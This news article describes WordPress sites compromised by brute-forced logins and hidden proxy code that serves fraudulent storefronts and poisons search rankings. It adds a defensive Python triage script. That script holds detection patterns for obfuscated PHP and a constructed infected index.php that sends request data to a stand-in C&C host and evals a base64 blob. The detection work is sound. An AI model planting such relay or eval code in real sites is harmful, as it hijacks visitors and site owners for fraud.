A newly observed cybercriminal group is compromising WordPress sites and planting hidden e-commerce storefronts on them, exploiting the sites' search rankings and reputation for fraud.
The attacks were discovered earlier this month when the malware hit a honeypot run by Akamai security researcher Larry Cashdollar. According to Cashdollar, the attackers gain access to the sites' administrative accounts by brute-forcing credentials, then overwrite the sites' main index files and inject malicious code into them.
Although the malicious code is heavily obfuscated, Cashdollar was able to determine that its main purpose is to act as a proxy, relaying all incoming requests to a command-and-control (C&C) server operated by the attackers.
A typical attack looks like this: when a visitor requests a page on a compromised site, the request is relayed to the C&C server. If the visitor meets certain criteria, the C&C server instructs the site to answer with an HTML page containing an online store selling household goods, so the visitor sees a fraudulent store instead of the legitimate site they asked for. According to the researcher, by the time the malware reached his honeypot the attackers had already installed more than 7,000 such stores on compromised sites.
The attackers also generate XML sitemaps for the compromised sites that list the fake store pages alongside the original pages. They submit the generated sitemap to Google and then delete it to avoid detection.
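The compromise chain described above suggests three checks a responder can run offline on copies of files pulled from a suspect site: whether index.php still contains only the two statements WordPress ships, whether a PHP file carries obfuscation or proxying idioms of the kind the article describes, and whether a sitemap lists URLs the site does not actually publish. The following Python is an added example written for this page, not code from Akamai or Larry Cashdollar, and it does not reproduce the actual malware; the indicator list, the host names (c2.example.invalid, victim.example), the injected snippet and the sample sitemap are all constructed for illustration.

```python
"""Offline triage checks for the WordPress compromise pattern described above.

Added example, not code from Akamai, Larry Cashdollar or the article.
The indicator list and every sample input below are constructed for
illustration; they are not the real malware or real sites from the research.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Generic signs of obfuscated or proxying PHP. Assumption: common dropper/proxy
# idioms, not a signature of the specific sample Cashdollar analysed.
PHP_INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gzinflate/gzuncompress": re.compile(r"\bgz(?:inflate|uncompress)\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    "curl_exec": re.compile(r"\bcurl_exec\s*\("),
    "remote file_get_contents": re.compile(r"\bfile_get_contents\s*\(\s*['\"]https?://"),
    "long base64 blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}

# The index.php WordPress ships, reduced to its statements with whitespace removed.
STOCK_INDEX_STATEMENTS = [
    "define('WP_USE_THEMES',true)",
    "require__DIR__.'/wp-blog-header.php'",
]


def scan_php_source(src: str) -> list[str]:
    """Names of the indicators present in a PHP source string, in PHP_INDICATORS order."""
    return [name for name, rx in PHP_INDICATORS.items() if rx.search(src)]


def php_statements(src: str) -> list[str]:
    """Statements of a PHP file with comments, PHP tags and all whitespace removed."""
    body = re.sub(r"/\*.*?\*/", "", src, flags=re.S)   # block comments
    body = re.sub(r"(?m)(?<!:)//.*$", "", body)         # line comments, but not the '//' in 'https://'
    body = re.sub(r"(?m)(^|\s)#.*$", "", body)          # shell-style comments
    body = body.replace("<?php", "").replace("?>", "")
    return [re.sub(r"\s+", "", s) for s in body.split(";") if s.strip()]


def index_is_stock(src: str) -> bool:
    """True only if index.php contains exactly the two statements WordPress ships."""
    return php_statements(src) == STOCK_INDEX_STATEMENTS


def sitemap_foreign_urls(sitemap_xml: str, site_host: str, known_paths: set[str]) -> list[str]:
    """<loc> entries whose host or path does not match content the site really serves."""
    ns = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}
    root = ET.fromstring(sitemap_xml)
    foreign = []
    for loc in root.iterfind(".//sm:loc", ns):
        url = (loc.text or "").strip()
        parsed = urlparse(url)
        if parsed.netloc != site_host or parsed.path not in known_paths:
            foreign.append(url)
    return foreign


# --- constructed sample inputs ---------------------------------------------
CLEAN_INDEX = """<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
"""

# Hypothetical injected prefix: relay the request to a C&C host, then eval a payload.
INFECTED_INDEX = (
    "<?php\n"
    "$c = curl_init('https://c2.example.invalid/gate.php?u=' . urlencode($_SERVER['REQUEST_URI']));\n"
    "curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);\n"
    "$r = curl_exec($c);\n"
    "eval(base64_decode('" + "QUJD" * 60 + "'));\n"
    + CLEAN_INDEX.replace("<?php\n", "", 1)
)

SAMPLE_SITEMAP = """<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://victim.example/</loc></url>
  <url><loc>https://victim.example/about/</loc></url>
  <url><loc>https://victim.example/blog/hello-world/</loc></url>
  <url><loc>https://victim.example/store/kitchen-appliances-sale/</loc></url>
  <url><loc>https://victim.example/store/home-goods-1234/</loc></url>
</urlset>
"""
# Paths the real site publishes (in practice taken from the WP database); constructed here.
KNOWN_PATHS = {"/", "/about/", "/blog/hello-world/"}


if __name__ == "__main__":
    print("clean index stock:", index_is_stock(CLEAN_INDEX), scan_php_source(CLEAN_INDEX))
    print("infected index stock:", index_is_stock(INFECTED_INDEX), scan_php_source(INFECTED_INDEX))
    print("foreign sitemap URLs:", sitemap_foreign_urls(SAMPLE_SITEMAP, "victim.example", KNOWN_PATHS))
```

Because the attackers delete the sitemap after submitting it, the sitemap check is most useful against a copy recovered from the search engine's webmaster tooling or against web-server logs showing the sitemap being fetched; the index.php and indicator checks do not depend on the sitemap surviving. The indicator list is deliberately coarse and will flag some legitimate plugins, so treat a hit as a reason to read the file, not as a verdict.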
This step looks innocuous, but it does real damage to the affected WordPress sites: it poisons their search keywords with unrelated, fraudulent entries, which lowers their search engine results page (SERP) rankings.
According to Cashdollar, this type of malware could be used in SEO-related ransomware schemes, in which criminals deliberately damage a site's search engine rankings and then demand a ransom to undo the damage.